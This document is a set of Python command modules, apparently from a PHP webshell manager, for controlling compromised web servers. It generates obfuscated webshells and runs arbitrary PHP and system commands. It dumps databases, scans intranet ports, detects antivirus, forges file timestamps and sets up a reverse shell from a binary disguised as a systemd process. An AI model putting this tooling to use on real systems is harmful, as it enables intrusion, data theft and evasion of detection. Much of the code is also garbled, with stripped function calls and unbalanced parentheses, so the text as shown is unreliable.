def run(file_path: str, web_file_path: str = "", force: bool = False): """ upload Upload file to target system. eg: upload {file_path} {web_file_path=file_name} {force=False} """ flag = True if (not web_file_path): web_file_path = path.basename(file_path) flag = False try: fp = open(file_path, "rb") except FileNotFoundError: print("\n" +"Local File not exist") + "\n") return php = get_php(web_file_path, force) res = send(php, files={"file": fp}) if (not res): return text = res.r_text.strip() if text == "success": if (flag): print( f"\nUpload {file_path} as {web_file_path} success\n")) else: print("\nUpload {file_path} success\n")) return True elif text == "exist": print(color.yellow(f"\n{web_file_path} exist\n")) return True else: print("\n" +"Upload error / Privileges not enough") + "\n")
def run(find_path: str = "/usr&/bin"): """ av (Only for windows) Detect anti-virus software running on the target system. ps: Need to run system commands Origin:, """ if (not is_windows()): print("\nTarget system isn't windows\n")) return res = send(get_system_code("tasklist /svc")) if (not res or not res.r_text or "No system execute function" in res.r_text): print("\nDetect error\n")) return with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"), "r", encoding="utf-8") as f: av_processes = loads( flag = 0 print("\n" +" " * 37 + "Result")) for line in res.r_text.split("\n"): process = line.split(' ')[0] if process in av_processes: flag = 1 print(" %40s - %-30s" % (color.cyan(process), color.yellow(av_processes[process]))) if (not flag): print(" %40s / %-30s" % ('No anti-virus'),'Not found'))) print()
def run(): """ execute execute Custom PHP code by notepad/vi. eg: execute """ file_name = "tmp" + str(uuid4()) file_path = gget("webshell.download_path", "webshell").replace(":", "_") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name) with open(real_file_path, "w"): pass open_editor(real_file_path) with open(real_file_path, "r") as f: code ="<?php").strip("?>") print(color.yellow("Execute php code...")) res = send(code) if (not res): return text = res.r_text.strip() print("\nResult:\n") + text + "\n") remove(real_file_path)
def run(web_file_path: str): """ write Write files directly to the target system by notepad/vi. eg: write {web_file_path} """ file_name = path.split(web_file_path)[1] file_path = gget("webshell.download_path", "webshell").replace(":", "_") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name) with open(real_file_path, "w"): pass open_editor(real_file_path) with open(real_file_path, "r") as f: result = base64_encode( res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\w+", text) and text != '0'): print("\nWrite {web_file_path} success.\n")) else: print("\nWrite {web_file_path} failed.") + color.yellow("\n\nResponse:") + f"\n{text}\n") remove(real_file_path)
def run(filename: str = ""): """ touch Create an empty file or Specify a file whose modification time stamp is the same as a random file in the current directory. eg: touch {filename=this_webshell} """ res = send(get_php(filename)) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print("\nSuccessfully created an empty file {filename}.\n")) elif (len(text) > 0): print("\nModify time stamp {text} success\n"))
def run(database: str = "", local_path: str = "", encoding: str = "utf8", blocksize: int = 1000, exclude: str = "", include: str = "", threads: int = 5): """ db_mdump Dump a database to a file by block compression and multi threads, Default file name is {database}.sql. You can use exclude options to exclude some tables. You can also use include options to dump only some tables. eg: db_mdump {database=current_database} {local_path=doughnuts/target/{database}.sql} {encoding="utf-8"} {blocksize=1000} {exclude="",eg="table1,table2"} {include="",eg="table1,table2"} {threads=5} """ global LOCK if (not gget("db_connected", "webshell")): print("Please run db_init command first")) return database = database if database else gget("db_dbname", "webshell") download_path = local_path or gget("webshell.download_path", "webshell") if not path.exists(download_path): makedirs(download_path) res = send(get_table_name_php(database)) if (not res): return tables = res.r_text.strip() with LOCK: print(color.yellow(f"\n[Try] Dump {database}\n")) with ThreadPoolExecutor(max_workers=threads) as tp: all_task = [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table not in exclude.split(",")] if ( not include) else [tp.submit(thread_dump, database, table, encoding, download_path, blocksize, threads) for table in tables.split("\n") if table in include.split(",")] wait(all_task, return_when=ALL_COMPLETED) with LOCK: print("\n[Success] Dump {database}\n"))
def run(host: str, username: str, password: str, dbname: str = "", port: int = 0): """ db_init Initialize the database connection. """ res = send(get_php(host, username, password, dbname, port)) if (not res): return if ("Connect error" in res.r_text): print("\n" + + "\n") else: print("\n" +"Connect success")) gset("db_connected", True, True, "webshell") gset("db_host", host, True, "webshell") gset("db_username", username, True, "webshell") gset("db_password", password, True, "webshell") gset("db_dbname", dbname, True, "webshell") gset("db_port", port, True, "webshell") info = res.r_text.strip() if (info): info_list = info.split("\n") try: gset("db_current_user", info_list[0], True, "webshell") gset("db_version", info_list[1], True, "webshell") print_db_info() except IndexError: print("\n" +"Select data error") + "\n")
def run(path: str = ".", mode: int = 1): """ ls List information about the files. eg: ls {path=.} {mode=1} mode: - 1 : scandir - 2 : glob """ res = send(get_php(path, mode)) if (not res): return info_list = res.r_text.strip().split('\n') print('\n'.join(info_list[:3])) ls_wordlist = [] for line in info_list[3:]: info = line.split(" ") if (len(info) < 7): continue ls_wordlist.append(info[6]) prems, name = info[0], info[-1] if (prems[0] == 'd'): info[-1] = color.cyan(name) info[3] = '' elif ('x' in prems): info[-1] = print("%s %-4s %-4s %6s %s %s %s" % (info[0], info[1], info[2], info[3], info[4], info[5], info[6])) for prefix in PREFIX_LIST: readline.add_prefix_wordlist(prefix, ls_wordlist)
def thread_dump(database, table, encoding, download_path, blocksize, threads): global LOCK table = table if table else "None" retry_time = 5 row_number = -1 while retry_time and row_number == -1: row_number = get_table_row_number(database, table) retry_time -= 1 if (row_number != -1): with LOCK: print(f"[Retry] fetch {database}.{table} [rows: {row_number}]") if (row_number == -1): with LOCK: print("[Error] fetch {database}.{table}")) return file_name = f"{database}.{table}.sql" file_path = path.join(download_path, file_name).replace("\\", "/") with LOCK: print(color.yellow( f"[Try] fetch {database}.{table} [rows: {row_number}]")) with open(file_path, "wb") as f, ThreadPoolExecutor(max_workers=threads) as tp: f.write(get_table_construct(database, table, encoding)) f.flush() all_task = [tp.submit(get_data, database, table, encoding, offset, blocksize) for offset in range(0, row_number, blocksize)] for future in as_completed(all_task): result = future.result() if (result): f.write(future.result()) f.flush() with LOCK: print( f"[Success] fetch {database}.{table} [rows: {row_number}]"))
def run(database: str = "", table: str = "", local_path: str = "", encoding: str = "utf8"): """ db_dump Dump a database or a table to a file, Default file name is {database}.sql. eg: db_dump {database=current_database} {local_path=doughnuts/target/{database}.sql} {encoding="utf-8"} """ if (not gget("db_connected", "webshell")): print("Please run db_init command first")) return database = database if database else gget("db_dbname", "webshell") download_path = local_path or gget("webshell.download_path", "webshell") if not path.exists(download_path): makedirs(download_path) file_name = f"{database}.sql" if (not table) else f"{database}.{table}.sql" res = send(get_php(database, table, encoding)) if (not res): return text = res.r_text.strip() content = res.r_content.strip() if (len(text) > 0 and res.status_code == 200): file_path = path.join(download_path, file_name).replace("\\", "/") with open(file_path, "wb") as f: f.write(gzinflate(b64decode(content))) print("\n" +"Dump {database} to {file_name} success") + "\n") elif ("Error" in res.r_text): print("\n" + + "\n") else: print("\nError\n"))
def run(ip: str, ports: str, _type: int = 2, timeout: float = 0.5): """ portscan Scan intranet ports. eg: portscan {ip} {ports} {_type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5} """ if (_type not in [1, 2, 3]): print("\nType error!\n")) return php = get_php(_type, ip, ports, timeout) res = send(php) if (not res): return port_result = res.r_json() # ------------------------------------------ if (len(port_result[0])): print('Open') + ' port:\n' + " " * 4 + human_friendly_list_print(sorted(port_result[0])) + '\n') if (len(port_result[1])): print('Close') + ' port:\n' + " " * 4 + human_friendly_list_print(sorted(port_result[1])) + '\n') if (len(port_result[2])): print( color.magenta('Timeout') + ' port:\n' + " " * 4 + human_friendly_list_print(sorted(port_result[2])) + '\n') print("")
def run(web_file_path: str, local_path: str = "", _use_raw_php_to_zip: bool = True): """ dump Package and compress files in a folder and download it. eg: dump {web_file_path} {local_path=./} """ if _use_raw_php_to_zip: php = get_raw_php(web_file_path) else: php = get_zip_php(web_file_path) res = send(php) if (not res): return content = res.r_content download_path = local_path or gget("webshell.download_path", "webshell") if len(content) and res.status_code == 200: file_name = (gget("webshell.netloc", "webshell") + ".zip" if (not len(local_path)) else "") if not path.exists(download_path): makedirs(download_path) file_path = path.join(download_path, file_name).replace("\\", "/") with open(file_path, "wb") as f: f.write(content) print("Downloaded file has been saved to {file_path}")) else: print("File not exist / Download error"))
def run(path: str = "."): """ ls List information about the files. eg: ls {path=.} """ res = send(get_php(path)) if (not res): return info_list = res.r_text.strip().split('\n') print('\n'.join(info_list[:3])) ls_wordlist = [] for line in info_list[3:]: info = line.split(" ") if (len(info) < 7): continue prems, name = info[0], info[-1] if (prems[0] == 'd'): info[-1] = color.cyan(name) info[3] = '' elif ('x' in prems): info[-1] = print("%s %-4s %-4s %6s %s %s %s" % (info[0], info[1], info[2], info[3], info[4], info[5], info[6])) ls_wordlist.append(info[6]) readline.add_wordlist("ls_wordlist", ls_wordlist)
def run(editor: str = ""): """ execute execute Custom PHP code by notepad / vi as default or your own editor. eg: execute {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, "a").close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: code = if (code.startswith("<?php")): code = code[5:] if (code.endswith("?>")): code = code[:-2] print(color.yellow("Execute php code...")) res = send(code) if (not res): return text = res.r_text.strip() status_code = res.status_code)) if res.status_code == 200 else color.yellow( str(res.status_code)) print( f"\n{'Result:')}\n[{status_code}] {color.cyan('length')}: {len(text)} \n{text}\n" ) remove(real_file_path)
def run( web_file_path: str, local_path: str = "", ) -> bool: """ download Download file(s) from target system. eg: download {web_file_path} {local_path=./} """ php = get_php(web_file_path) res = send(php) if (not res): return content = res.r_content download_path = local_path or gget("webshell.download_path", "webshell") if len(content): file_name = path.split(web_file_path)[1] if not path.exists(download_path): makedirs(download_path) file_path = path.join(download_path, file_name) with open(file_path, "wb") as f: f.write(content) print("Downloaded file has been saved to {file_path}")) return file_path else: print("File not exist / Download error")) return ''
def run(web_file_path: str, editor: str = ""): """ write Write files directly to the target system by notepad / vi as default or your own editor. eg: write {web_file_path} {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, 'a').close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: result = base64_encode( res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print("\nWrite {web_file_path} success.\n")) else: print("\nWrite {web_file_path} failed.\n")) remove(real_file_path)
def run(lhost: str, port: int, mode: int = 0, fakename: str = "/usr/lib/systemd"): """ reshell Bind a local port and wait for target connect back to get a full shell. eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd} """ if (is_windows(False) or is_windows()): print("Only for both system is linux.")) return False try: port = int(port) except ValueError: port = 23333 disable_func_list = gget("webshell.disable_functions", "webshell") MODE = 1 print(color.yellow(f"Waring: You are using a testing command....")) print(color.yellow(f" Please make sure Port {port} open....")) if (mode == 0): if (has_env("python")): print("Traget has python environment.")) MODE == 1 else: print("Traget has not python environment.")) MODE == 2 else: MODE = int(mode) if ("proc_open" in disable_func_list): print("proc_open is disabled... Try Mode 3")) return if (MODE == 1): print(color.yellow(f"Use Mode 1->python")) command = get_php(lhost, port) else: print(color.yellow(f"Use Mode 2->upload")) filename = encrypt(f"{lhost}-{port}") if not upload( path.join(gget("root_path"), "auxiliary", "reshell", "reverse_server_x86_64"), "/tmp/%s" % filename, True): return command = get_system_code( f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}", False) t = Thread(target=delay_send, args=(2, command)) t.setDaemon(True) t.start() print(f"Bind port {color.yellow(str(port))}...") if (not bind(port, MODE)): print("Bind port error.")) if (MODE == 3): res = send(f"unlink('/tmp/{filename}');") if (not res): return
def run(*coomands): """ lsh Run a command on local machine. """ command = str(value_translation(gget("raw_command_args"))) if (command): if (command.startswith("cd ")): chdir(command[3:]) print("\nResult:\n\n") + "current working directory:\n\n " + getcwd() + "\n") else: print("\nResult:\n")) system(command) print()
def run(host: str, username: str, password: str, dbname: str = "", port: int = 0, dbms: str = "mysql"): """ db_init Initialize the database connection. Support dbms: - mysql - mssql - access eg: db_init {host} {username} {password} {dbname=''} {port=0} {dbms='mysql'} """ dbms = dbms.lower() db_ext = dbms res = send(detect_ext("PDO", "mysqli")) if (not res): # 探测是否存在pdo/mysqli扩展 print("\n" +"Detect error") + "\n") return text = res.r_text.lower() if (dbms == "mysql" and not text): print("\n" +"No PDO and mysqli extension") + "\n") return elif ("pdo" not in text): print("\n" +"No PDO extension") + "\n") return if (dbms in PDO_DMBS_EXT_DICT): res = send(detect_ext(*PDO_DMBS_EXT_DICT[dbms])) text = res.r_text.strip() if (not res): # 探测pdo支持的mssql扩展 print("\n" +"Detect PDO extension for {dbms} error") + "\n") return db_ext = text.split(",")[0][4:] gset("db_dbms", dbms, True, "webshell") gset("db_ext", db_ext, True, "webshell") gset("db_connect_type", text.split(",")[0], True, "webshell") res = send(get_php(host, username, password, dbname, port)) if (not res): return if ("Connect error" in res.r_text): print("\n" + + "\n") else: print("\n" +"Connect success")) gset("db_connected", True, True, "webshell") gset("db_host", host, True, "webshell") gset("db_username", username, True, "webshell") gset("db_password", password, True, "webshell") gset("db_dbname", dbname, True, "webshell") gset("db_port", port, True, "webshell") info = res.r_text.strip() if (info): info_list = info.split("\n") try: gset("db_current_user", info_list[0], True, "webshell") gset("db_version", info_list[1], True, "webshell") print_db_info() except IndexError: print("\n" +"Select data error") + "\n")
def run(proxy_url: str = ""): """ proxy Set proxy for requests, Support socks and http, Set None to unset. eg: proxy {proxy_url=''} """ if (proxy_url == ""): print("\n" +"Current proxy: {gget('proxy_url', 'webshell')}") + "\n") else: if (proxy_url.lower() == "none"): proxy_url = None Session.proxies = {'http': proxy_url, 'https': proxy_url} print("\n" +"Set proxy: proxy {proxy_url}") + "\n") gset("proxy_url", proxy_url, True, namespace="webshell")
def run(*commands): """ shell Get a temporary shell of target system by system function or just run a shell command. """ command = str(value_translation(gget("raw_command_args"))) if (command): res = send(get_system_code(command)) if (not res): return print("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n" )) res = send( f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());' ).r_text.strip() prompt, pwd = res.split("|") set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WINDOWS_WORDLIST if ( is_windows()) else NEW_UNIX_WORDLIST) if is_windows(): prompt = "%s> " else: prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ " try: while gget("loop"): print(prompt % pwd, end="") command = str(value_translation(readline())) lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue b64_pwd = base64_encode(pwd) if (lower_command.startswith("cd ") and len(lower_command) > 3): path = base64_encode(lower_command[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' + get_system_code(command)) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(file_name: str, keyword: str = "POST", passwd: str = "", salt: str = "", _type: int = 1): """ generate Generate a webshell using doughnuts encoding (password and salt none is random). keyword: - GET - POST - COOKIE - HEADER _type: - 1 : Pudding - 2 : Icecream - 3 : Popsicle - 4 : Gululingbo """ raw_keyword = keyword.upper() if (raw_keyword not in keyword_dict): print("\nKeyword error\n")) return keyword = keyword_dict[raw_keyword] if (_type not in type_dict): print("\nType error\n")) return passwd = str(passwd) if passwd else ranstr(randint(5, 8)) salt = str(salt) if salt else ranstr(randint(5, 8)) php = get_php(keyword, passwd, salt, _type) file_path, file_name = path.split(path.realpath(file_name)) file_real_path = path.join(file_path, file_name) if (path.exists(file_real_path)): print("\nFile is exist\n")) return elif (not path.exists(file_path)): print("\nFile path is invalid\n")) return with open(file_real_path, "w+") as f: f.write(php) print( f"\ngenerate {type_dict[_type]}'s php in {file_real_path}! enjoy it!" )) print(color.yellow("\nUsage:")) print( color.yellow( f" Interactive interface : connect url {raw_keyword} {passwd} doughnuts-{salt}" )) print( color.yellow( f" Non-Interactive interface: doughnuts connect url {raw_keyword} {passwd} doughnuts-{salt}\n" ))
def run(filename: str = ""): """ touch Create an empty file or (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory. eg: touch {filename=this_webshell} """ command = get_system_code("touch -r $reference $file", False) res = send(get_php(filename, command)) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print("\nSuccessfully created an empty file {filename}.\n")) elif ("No system execute function!" in text): print("\nall the system execute commands are disabled.\n")) else: print("\nModify time stamp {text} success.\n"))
def run(): """ db_shell Get a temporary sql shell of target system. """ if (not gget("db_connected", "webshell")): print("Please run db_init command first")) return print( color.cyan( "Eenter interactive temporary sql shell...\n\nUse 'back' command to return doughnuts.\n" )) database = gget("db_dbname", "webshell") prompt = "mysql (%s) > " set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_SQL_WORDLIST) try: while gget("loop"): print(prompt % color.cyan(database), end="") command = readline() lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue if (lower_command.startswith("use ") and len(lower_command) > 4): try: temp_database = match("use ([^;]*);?", lower_command).group(1) res = send(check_database(temp_database)) if ("Connect error" in res.r_text): print("\n" + + "\n") else: database = temp_database print("\n" + f"Change current database: {database}") + "\n") except (IndexError, AttributeError): print("\n" +"SQL syntax error") + "\n") else: form = execute_sql_command(command, database) if (form == ''): print("\n" +"Connection Error / SQL syntax error") + "\n") else: print(execute_sql_command(command, database)) finally: gset("db_dbname", database, True, "webshell") readline.set_wordlist(wordlist)
def run(*commands): """ webshell Get a webshell of target system or just run a webshell command. """ command = gget("raw_command_args") if (command): res = send((command)) if (not res): return print("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n" )) pwd = send(f'print(getcwd());').r_text.strip() set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WORDLIST) try: while gget("loop"): print(f"webshell:{pwd} >> ", end="") data = readline(b"(") lower_data = data.lower() if (lower_data.lower() in ['exit', 'quit', 'back']): print() break if (data == ''): print() continue data = base64_encode(data) b64_pwd = base64_encode(pwd) if (lower_data.startswith("cd ") and len(lower_data) > 3): path = base64_encode(lower_data[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send( f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");' ) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(): """ pdf print disable_functions of website. """ disable_func_list = gget("webshell.disable_functions", "webshell") if len(disable_func_list): print("\ndisable_functions:\n")) print(" " + "\n ".join(disable_func_list) + "\n") else: print( f"{'No disable_functions')} / {'Read error')}" )
def run(timeout: float = 2.0): """ check Check if each webshell is alive. eg: check {timeout=2.0} """ if not exists("webshell.log"): print("No webshell.Log")) return 0 with open("webshell.log", "r") as f: for index, line in enumerate(f, 1): url, method, pwd, *encode_functions = line.split("|") if method == "GET": raw_key = "params" elif method == "POST": raw_key = "data" elif method == "COOKIE": raw_key = "cookies" elif method == "HEADER": raw_key = "headers" else: print( f"[{}] {'Method error')}") continue check_command = "print(md5(1));" encode_pf = gget("") for func in encode_functions: if func in encode_pf: check_command = encode_pf[func].run(check_command) params_dict = {"data": {}, "timeout": timeout} params_dict[raw_key] = {} params_dict[raw_key][pwd] = check_command common_text, status_code_text = "", "000" try: res = post(url, verify=False, **params_dict) status_code_text = str(res.status_code) if ("c4ca4238a0b923820dcc509a6f75849b" in res.text): common_text ="Alive") else: common_text ="Not Alive") except exceptions.Timeout: common_text = color.yellow("Timeout") except exceptions.RequestException: common_text ="Request error") print( f"[{}] [{color.yellow(status_code_text)}] {common_text} {url}" )
def run(database: str): """ db_use Change current database. """ if (not gget("db_connected", "webshell")): print("Please run db_init command first")) return res = send(get_php(database)) if ("Connect error" in res.r_text): print("\n" + + "\n") else: print("\n" +"Change current database: {database}") + "\n") gset("db_dbname", database, True, "webshell")
def run(pattern: str): """ read Search file(s) from target system. eg: search {pattern} """ res = send(get_php(pattern)) if (not res): return files = res.r_text.strip() if (len(files)): print("\n" +"Search Result:") + "\n " + files.replace("./", "").replace("\n", "\n ") + "\n") else: print("\n" +"File not exist / Search error") + "\n")
def run(*web_file_paths): """ rm Delete target system file(s). eg: remove {web_file_path1} {web_file_path2} .. """ for each_file_path in web_file_paths: php = get_php(each_file_path) res = send(php) if (not res): return text = res.r_text.strip() if (text == 'success'): print("\n" +"Delete {each_file_path} success.") + "\n") else: print("\n" +"Delete {each_file_path} failed.") + "\n")